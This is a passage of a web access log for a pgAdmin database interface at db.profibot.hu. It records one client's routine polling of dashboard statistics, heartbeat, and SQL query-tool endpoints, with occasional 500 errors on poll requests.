"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:53 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 363] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:53 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:59 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:08:01 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:08:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:08:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:08:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:09:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:09:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:09:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:10:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:10:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:11:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:11:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:12:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:12:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:12:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:13:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:13:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:14:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:14:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:15:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:15:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:16:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:16:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:17:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:17:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:17:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:18:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:18:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:02 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:02 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:02 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:04 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:06 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:08 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:10 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:10 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:11 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:11 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 238] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:11 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:12 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:16 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:18 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:19:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 